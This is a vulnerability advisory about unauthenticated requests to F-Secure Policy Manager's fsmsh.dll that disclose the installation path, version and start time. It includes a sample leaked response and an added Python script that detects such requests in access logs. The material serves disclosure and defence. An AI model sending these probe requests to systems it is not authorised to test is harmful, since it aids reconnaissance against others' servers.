F-Secure's Policy Manager comes bundled with a web server. This web server contains a DLL called fsmsh.dll that can be used to discover the local path under which F-Secure is installed, in addition to the exact version of the product and when it was started.
Vulnerable Systems:
* FSMSH version 5.11.2810
* FSMSH version 5.50.3110
* FSMSH version 5.50.3160
* FSMSH version 5.60.4111
F-Secure's Policy Manager web server runs on port 80/TCP. Connecting to the port with a web browser offers the following link, available without authentication: /fsms/fsmsh.dll?FSMSCommand=GetVersion
Following this link will give the Version Number of the application: 5.11.2810
However, modifying the link as follows: /fsms/fsmsh.dll?
will give the following result, containing the physical path of the F-Secure installation:
FSMSH Version 5.11.2810
Started at: 04/12/07 20:18:48
Processed requests: 8780
Commdir path: C:\Programme\F-Secure\Management Server 5\CommDir
COMMDIR: C:\Programme\F-Secure\Management Server 5\CommDir found
C:\Programme\F-Secure\Management Server 5\CommDir\commdir.cfg found
Repository API initialized - status: OK
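
To find such requests in the server's own logs, the following added example (not part of the original advisory or of F-Secure's code) scans access-log lines for successful requests to fsmsh.dll and separates the GetVersion request from requests that carry no FSMSCommand. The Common Log Format, the case-insensitive path match, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines. Common Log Format is an assumption; the
# advisory does not describe the web server's log format.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Apr/2007:20:19:01 +0200] "GET /fsms/fsmsh.dll?FSMSCommand=GetVersion HTTP/1.1" 200 9
192.0.2.77 - - [12/Apr/2007:20:21:44 +0200] "GET /fsms/fsmsh.dll? HTTP/1.1" 200 412
192.0.2.77 - - [12/Apr/2007:20:21:50 +0200] "GET /FSMS/FSMSH.DLL? HTTP/1.0" 200 412
192.0.2.10 - - [12/Apr/2007:20:22:03 +0200] "GET /index.html HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def classify(target):
    """Return 'no-command', 'version', 'other-command', or None if not fsmsh.dll."""
    parts = urlsplit(target)
    # Assumption: the path is matched case-insensitively (Windows host).
    if parts.path.lower() != "/fsms/fsmsh.dll":
        return None
    params = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    commands = params.get("fsmscommand")
    if not commands:
        # Shape of the request the advisory says returns path and start time.
        return "no-command"
    if commands[0].lower() == "getversion":
        return "version"
    return "other-command"

def find_disclosures(log_text):
    """List (client, time, kind, target) for successful disclosure requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, _method, target, status = m.groups()
        kind = classify(target)
        if kind in ("no-command", "version") and status == "200":
            hits.append((client, when, kind, target))
    return hits

if __name__ == "__main__":
    for hit in find_disclosures(SAMPLE_LOG):
        print(*hit, sep="\t")
```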